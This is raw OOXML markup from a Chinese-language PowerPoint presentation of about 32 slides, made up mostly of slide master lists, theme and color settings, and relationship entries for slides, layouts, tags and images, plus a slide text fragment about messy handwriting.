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.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme70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3"/>
    <p:sldMasterId id="2147483652" r:id="rId4"/>
    <p:sldMasterId id="2147483654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  <p:sldMasterId id="2147483669" r:id="rId12"/>
    <p:sldMasterId id="2147483671" r:id="rId13"/>
    <p:sldMasterId id="2147483673" r:id="rId14"/>
    <p:sldMasterId id="2147483675" r:id="rId15"/>
    <p:sldMasterId id="2147483677" r:id="rId16"/>
    <p:sldMasterId id="2147483679" r:id="rId17"/>
    <p:sldMasterId id="2147483681" r:id="rId18"/>
    <p:sldMasterId id="2147483683" r:id="rId19"/>
    <p:sldMasterId id="2147483685" r:id="rId20"/>
    <p:sldMasterId id="2147483687" r:id="rId21"/>
    <p:sldMasterId id="2147483689" r:id="rId22"/>
    <p:sldMasterId id="2147483691" r:id="rId23"/>
    <p:sldMasterId id="2147483693" r:id="rId24"/>
    <p:sldMasterId id="2147483695" r:id="rId25"/>
    <p:sldMasterId id="2147483697" r:id="rId26"/>
    <p:sldMasterId id="2147483699" r:id="rId27"/>
    <p:sldMasterId id="2147483701" r:id="rId28"/>
    <p:sldMasterId id="2147483703" r:id="rId29"/>
    <p:sldMasterId id="2147483705" r:id="rId30"/>
    <p:sldMasterId id="2147483707" r:id="rId31"/>
    <p:sldMasterId id="2147483709" r:id="rId32"/>
    <p:sldMasterId id="2147483711" r:id="rId33"/>
    <p:sldMasterId id="2147483713" r:id="rId34"/>
    <p:sldMasterId id="2147483715" r:id="rId35"/>
    <p:sldMasterId id="2147483717" r:id="rId36"/>
    <p:sldMasterId id="2147483719" r:id="rId37"/>
    <p:sldMasterId id="2147483721" r:id="rId38"/>
    <p:sldMasterId id="2147483723" r:id="rId39"/>
    <p:sldMasterId id="2147483725" r:id="rId40"/>
    <p:sldMasterId id="2147483727" r:id="rId41"/>
    <p:sldMasterId id="2147483729" r:id="rId42"/>
    <p:sldMasterId id="2147483731" r:id="rId43"/>
    <p:sldMasterId id="2147483733" r:id="rId44"/>
    <p:sldMasterId id="2147483735" r:id="rId45"/>
    <p:sldMasterId id="2147483737" r:id="rId46"/>
    <p:sldMasterId id="2147483739" r:id="rId47"/>
    <p:sldMasterId id="2147483741" r:id="rId48"/>
    <p:sldMasterId id="2147483743" r:id="rId49"/>
    <p:sldMasterId id="2147483745" r:id="rId50"/>
    <p:sldMasterId id="2147483747" r:id="rId51"/>
    <p:sldMasterId id="2147483749" r:id="rId52"/>
    <p:sldMasterId id="2147483751" r:id="rId53"/>
    <p:sldMasterId id="2147483753" r:id="rId54"/>
    <p:sldMasterId id="2147483755" r:id="rId55"/>
    <p:sldMasterId id="2147483757" r:id="rId56"/>
    <p:sldMasterId id="2147483759" r:id="rId57"/>
    <p:sldMasterId id="2147483761" r:id="rId58"/>
    <p:sldMasterId id="2147483763" r:id="rId59"/>
    <p:sldMasterId id="2147483765" r:id="rId60"/>
    <p:sldMasterId id="2147483767" r:id="rId61"/>
    <p:sldMasterId id="2147483769" r:id="rId62"/>
    <p:sldMasterId id="2147483771" r:id="rId63"/>
    <p:sldMasterId id="2147483773" r:id="rId64"/>
    <p:sldMasterId id="2147483775" r:id="rId65"/>
    <p:sldMasterId id="2147483777" r:id="rId66"/>
    <p:sldMasterId id="2147483779" r:id="rId67"/>
    <p:sldMasterId id="2147483781" r:id="rId68"/>
    <p:sldMasterId id="2147483783" r:id="rId69"/>
    <p:sldMasterId id="2147483785" r:id="rId70"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId74"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId71"/>
    <p:sldId id="665" r:id="rId72"/>
    <p:sldId id="644" r:id="rId73"/>
    <p:sldId id="795" r:id="rId75"/>
    <p:sldId id="796" r:id="rId76"/>
    <p:sldId id="797" r:id="rId77"/>
    <p:sldId id="798" r:id="rId78"/>
    <p:sldId id="799" r:id="rId79"/>
    <p:sldId id="800" r:id="rId80"/>
    <p:sldId id="803" r:id="rId81"/>
    <p:sldId id="802" r:id="rId82"/>
    <p:sldId id="804" r:id="rId83"/>
    <p:sldId id="805" r:id="rId84"/>
    <p:sldId id="806" r:id="rId85"/>
    <p:sldId id="807" r:id="rId86"/>
    <p:sldId id="808" r:id="rId87"/>
    <p:sldId id="809" r:id="rId88"/>
    <p:sldId id="810" r:id="rId89"/>
    <p:sldId id="812" r:id="rId90"/>
    <p:sldId id="813" r:id="rId91"/>
    <p:sldId id="814" r:id="rId92"/>
    <p:sldId id="811" r:id="rId93"/>
    <p:sldId id="815" r:id="rId94"/>
    <p:sldId id="816" r:id="rId95"/>
    <p:sldId id="817" r:id="rId96"/>
    <p:sldId id="818" r:id="rId97"/>
    <p:sldId id="819" r:id="rId98"/>
    <p:sldId id="820" r:id="rId99"/>
    <p:sldId id="821" r:id="rId100"/>
    <p:sldId id="822" r:id="rId101"/>
    <p:sldId id="823" r:id="rId102"/>
    <p:sldId id="637" r:id="rId103"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId107"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId10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1202F"/>
    <a:srgbClr val="07A7AF"/>
    <a:srgbClr val="FADBD8"/>
    <a:srgbClr val="37BECC"/>
    <a:srgbClr val="D7F2F5"/>
    <a:srgbClr val="E74C3C"/>
    <a:srgbClr val="CA3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12" y="44"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="207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28.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster8.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9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8.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster69.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster68.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster67.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster66.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster65.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster64.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster63.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster62.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster61.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster60.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster59.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster58.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster57.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster56.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster55.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster54.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster53.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster52.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster51.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster50.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster49.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster4.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster48.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster47.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster46.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster45.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster44.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster43.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster42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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag613.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29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21922-B392-49CB-98B2-D1506FCEEC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082BF-40C1-4E6C-9085-1B48E30F0B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字迹混乱（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Regis Method?)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3020B4-C4F0-47FB-9EF6-DA1D8CA35C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284FBA-1E51-41CA-94CE-3C4A9B97CA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0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0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0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0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0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0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0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tags" Target="../tags/tag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0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0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0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0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0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0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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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Layout" Target="../slideLayouts/slideLayout2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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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Layout" Target="../slideLayouts/slideLayout2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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16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Layout" Target="../slideLayouts/slideLayout3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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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Layout" Target="../slideLayouts/slideLayout3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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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Layout" Target="../slideLayouts/slideLayout3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3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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Layout" Target="../slideLayouts/slideLayout34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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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Layout" Target="../slideLayouts/slideLayout3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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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Layout" Target="../slideLayouts/slideLayout36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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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Layout" Target="../slideLayouts/slideLayout37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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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Layout" Target="../slideLayouts/slideLayout3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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag198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Layout" Target="../slideLayouts/slideLayout39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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag202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slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme4.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag206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Layout" Target="../slideLayouts/slideLayout4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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag210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slideLayout" Target="../slideLayouts/slideLayout4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.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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Layout" Target="../slideLayouts/slideLayout43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.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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Layout" Target="../slideLayouts/slideLayout4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4.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22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Layout" Target="../slideLayouts/slideLayout45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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag226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Layout" Target="../slideLayouts/slideLayout46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theme" Target="../theme/theme46.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag230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slideLayout" Target="../slideLayouts/slideLayout4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heme" Target="../theme/theme47.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23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Layout" Target="../slideLayouts/slideLayout48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theme" Target="../theme/theme48.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23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slideLayout" Target="../slideLayouts/slideLayout49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theme" Target="../theme/theme49.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24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tags" Target="../tags/tag24.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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Layout" Target="../slideLayouts/slideLayout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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag246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Layout" Target="../slideLayouts/slideLayout51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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag250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slideLayout" Target="../slideLayouts/slideLayout52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theme" Target="../theme/theme52.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25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slideLayout" Target="../slideLayouts/slideLayout53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theme" Target="../theme/theme53.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25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slideLayout" Target="../slideLayouts/slideLayout54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theme" Target="../theme/theme54.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26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slideLayout" Target="../slideLayouts/slideLayout5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5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag266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slideLayout" Target="../slideLayouts/slideLayout56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theme" Target="../theme/theme56.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag270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Layout" Target="../slideLayouts/slideLayout57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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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slideLayout" Target="../slideLayouts/slideLayout58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theme" Target="../theme/theme58.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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slideLayout" Target="../slideLayouts/slideLayout59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theme" Target="../theme/theme59.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28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theme" Target="../theme/theme60.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag286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slideLayout" Target="../slideLayouts/slideLayout61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theme" Target="../theme/theme61.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag290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slideLayout" Target="../slideLayouts/slideLayout6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theme" Target="../theme/theme62.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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slideLayout" Target="../slideLayouts/slideLayout63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theme" Target="../theme/theme63.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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slideLayout" Target="../slideLayouts/slideLayout64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theme" Target="../theme/theme64.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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slideLayout" Target="../slideLayouts/slideLayout65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theme" Target="../theme/theme65.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag306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slideLayout" Target="../slideLayouts/slideLayout66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6.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag310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slideLayout" Target="../slideLayouts/slideLayout67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theme" Target="../theme/theme67.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag314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slideLayout" Target="../slideLayouts/slideLayout68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theme" Target="../theme/theme68.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag318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slideLayout" Target="../slideLayouts/slideLayout69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theme" Target="../theme/theme69.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag322.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png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0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07A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07A7AF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="47000">
                  <a:srgbClr val="07A7AF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BB60E3-B36B-43A6-B31C-E7226B1077ED}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1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3" name="矩形 22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D1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D1202F"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="47000">
                  <a:srgbClr val="C00000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30" name="灯片编号占位符 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/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772059-CF1C-459A-BD31-B6DE255639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V="1">
            <a:off x="0" y="6487795"/>
            <a:ext cx="12192000" cy="370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6572250"/>
            <a:ext cx="12192000" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A72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阿里巴巴普惠体 R" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
            </a:endParaRPr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184" y="180670"/>
            <a:ext cx="756000" cy="756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 rot="5400000" flipV="1">
            <a:off x="6348182" y="-4812103"/>
            <a:ext cx="0" cy="11520000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rgbClr val="A728BE"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="47000">
                  <a:srgbClr val="A728BE">
                    <a:alpha val="30000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="灯片编号占位符 10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11347200" y="6076800"/>
            <a:ext cx="82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D9BB5D0-35E4-459D-AEF3-FE4D7C45CC19}" type="slidenum">
              <a:rPr lang="zh-CN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image" Target="../media/image5.png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image" Target="../media/image4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag32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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png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image" Target="../media/image12.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag363.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag362.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag361.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout51.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag380.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.jpeg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag379.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag378.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag377.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag376.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag375.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag360.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag374.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag373.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag372.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag371.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag370.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag369.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag368.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag367.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag366.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag365.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag35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image" Target="../media/image12.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag385.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag384.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag383.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout52.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag403.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag402.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.jpeg"/><Relationship Id="rId24" 